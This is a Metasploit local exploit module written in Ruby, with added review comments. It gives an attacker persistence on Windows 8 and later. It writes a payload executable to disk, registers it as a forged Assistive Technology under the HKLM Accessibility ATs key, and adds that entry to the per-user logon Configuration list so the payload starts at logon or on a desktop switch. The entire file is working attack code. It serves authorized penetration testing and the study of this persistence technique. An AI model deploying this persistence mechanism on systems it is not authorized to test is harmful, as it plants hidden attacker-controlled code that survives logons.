##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
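# Persistence via a forged Assistive Technology (AT) registration (ATT&CK T1546.008).
#
# Artifacts left on the target (all undone by the clean-up resource script):
#   * the payload executable under WritableDir,
#   * a subkey under HKLM\...\Accessibility\ATs describing the AT,
#   * the AT name appended to HKCU\...\Accessibility\Configuration.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::Local::Persistence
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Priv

  # Machine-wide AT registration root. Writing under HKLM is why check() insists on is_admin?.
  AT_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs'
  # Per-user key whose 'Configuration' value lists the ATs started at logon. Because it lives in
  # HKCU the trigger is bound to whichever hive HKCU resolves to for the session.
  # NOTE(review): for a SYSTEM session that is not the interactive user's hive -- confirm.
  # (Constant name typo kept for compatibility with anything referencing it.)
  STARUP_REG_PATH = 'HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Assistive Technologies Persistence',
        'Description' => %q{
          This module achieves persistence by registering a custom Assistive Technology (AT) in the Windows registry.
          Then it configures the system to launch the AT executable during user logon or desktop switch (such as with
          an admin prived program).
          Requires Windows 8 or higher and administrative privileges.
        },
        'Author' => ['h00die'],
        'Platform' => ['win'],
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
        'SessionTypes' => ['meterpreter', 'shell'],
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1546_008_ACCESSIBILITY_FEATURES],
          ['URL', 'https://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/'],
          ['URL', 'https://msdn.microsoft.com/ru-ru/library/windows/desktop/bb879984.aspx']
        ],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2016-07-22',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
        }
      )
    )

    # All three default to a random alpha string when unset (see install_persistence / create_at).
    register_options([
      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
      OptString.new('NAME', [false, 'Name of assistive technolog to create. Random string as default.']),
      OptString.new('DESCRIPTION', [false, 'Description of assistive technolog to create. Random string as default.']),
    ])
  end

  # Register +at_name+ as an Assistive Technology under AT_REG_PATH, pointing at +payload_path+.
  #
  # @param at_name [String] subkey name (also used as the AT's SimpleProfile)
  # @param payload_path [String] full path of the dropped executable
  # @return [void]
  def create_at(at_name, payload_path)
    target_key = "#{AT_REG_PATH}\\#{at_name}"
    at_description = datastore['DESCRIPTION'] || Rex::Text.rand_text_alpha(rand(6..13))

    registry_createkey(target_key)
    # Resource string borrowed from the stock Accessibility control panel DLL.
    registry_setvaldata(target_key, 'ApplicationName', '@%SystemRoot%\\system32\\AccessibilityCPL.dll,-85', 'REG_EXPAND_SZ')
    # ATExe carries only the image name; StartExe below carries the full launch path.
    registry_setvaldata(target_key, 'ATExe', payload_path.split('\\').last, 'REG_SZ')
    registry_setvaldata(target_key, 'CopySettingsToLockedDesktop', 1, 'REG_DWORD')
    registry_setvaldata(target_key, 'Description', at_description, 'REG_SZ')
    # NOTE(review): the <Accommodation ...> element is not closed ('/>' missing before </HCIModel>).
    # Left byte-identical; confirm against the linked HCI profile documentation before changing it.
    registry_setvaldata(target_key, 'Profile', '<HCIModel><Accommodation type="mild dexterity"</HCIModel>', 'REG_SZ') # https://learn.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration?redirectedfrom=MSDN#hci-profile
    registry_setvaldata(target_key, 'SimpleProfile', at_name, 'REG_SZ')
    registry_setvaldata(target_key, 'StartExe', payload_path, 'REG_EXPAND_SZ')
    # 0 => the AT process is not killed when the desktop switches (the "desktop switch" trigger
    # the module description refers to).
    registry_setvaldata(target_key, 'TerminateOnDesktopSwitch', 0, 'REG_DWORD')
  end

  # Resolve the Persistence mixin's WritableDir to a concrete path.
  #
  # A value beginning with '%' (e.g. the mixin's %TEMP% default) is treated as an environment
  # variable reference and expanded on the target; anything else is returned unchanged.
  #
  # @return [String] directory the payload is dropped in
  def writable_dir
    dir = super
    return dir unless dir.start_with?('%')

    # NOTE(review): session.sys is a Meterpreter API, but 'shell' is also in SessionTypes; an
    # env-var WritableDir on a plain shell session will not resolve here -- confirm/handle.
    session.sys.config.getenv(dir)
  end

  # Pre-flight checks: WritableDir must exist on the target, the OS must be Windows 8 or newer,
  # and the session must be elevated (the AT registration is written under HKLM).
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    # Inspect the raw option rather than writable_dir so the hint fires before expansion.
    if datastore['WritableDir'].to_s.start_with?('%TEMP%')
      print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.')
    end
    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)

    version = get_version_info
    return CheckCode::Safe('Only supported on Windows 8 and above') unless version.build_number >= Msf::WindowsVersion::Win8

    # This branch is the *failure* path; the previous message ('You have admin rights...') said the opposite.
    return CheckCode::Safe('Administrative privileges are required to run this module') unless is_admin?

    CheckCode::Appears('Likely exploitable')
  end

  # Drop the payload, register it as an AT and add it to the per-user logon list.
  # Each step appends an undo line to @clean_up_rc (a Meterpreter resource script owned by the
  # Persistence mixin).
  #
  # @return [void]
  # @raise [Msf::Exploit::Failed] via fail_with if the payload cannot be written
  def install_persistence
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
    payload_pathname = "#{writable_dir}\\#{payload_name}"
    payload_pathname += '.exe' unless payload_pathname.downcase.end_with?('.exe')

    vprint_status("Payload pathname: #{payload_pathname}")
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, generate_payload_exe)

    at_name = datastore['NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
    vprint_status("Creating Assistive Technology #{at_name} registry entries")
    create_at(at_name, payload_pathname)

    vprint_status('Setting AT to start during login')
    # The value is absent (nil) on a profile where no AT was ever configured; calling .empty? on
    # it raised NoMethodError. Keep the raw value so clean-up can restore it exactly.
    original_config = registry_getvaldata(STARUP_REG_PATH, 'Configuration')
    at_list = original_config.to_s.split(',').map(&:strip).reject(&:empty?)
    at_list << at_name unless at_list.include?(at_name)
    registry_setvaldata(STARUP_REG_PATH, 'Configuration', at_list.join(','), 'REG_SZ')

    print_good('New AT added. Will launch on logon or desktop switch (such as with an admin prived program).')

    # Backslashes are doubled so the path survives the resource-script parser.
    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '\\\\\\\\')}\"\n"
    @clean_up_rc << "execute -f cmd.exe -a '/c reg delete \"#{AT_REG_PATH}\\#{at_name}\" /f' -H\n"
    if original_config.nil?
      # Nothing to restore: remove the value instead of leaving an empty one behind.
      @clean_up_rc << "execute -f cmd.exe -a '/c reg delete \"#{STARUP_REG_PATH}\" /v Configuration /f' -H\n"
    else
      # The value is interpolated into a quoted cmd.exe argument; a quote inside it would break
      # the command line (unlikely for a comma-separated list of AT names, but not escaped here).
      @clean_up_rc << "execute -f cmd.exe -a '/c reg add \"#{STARUP_REG_PATH}\" /v Configuration /t REG_SZ /d \"#{original_config}\" /f' -H\n"
    end
  end
end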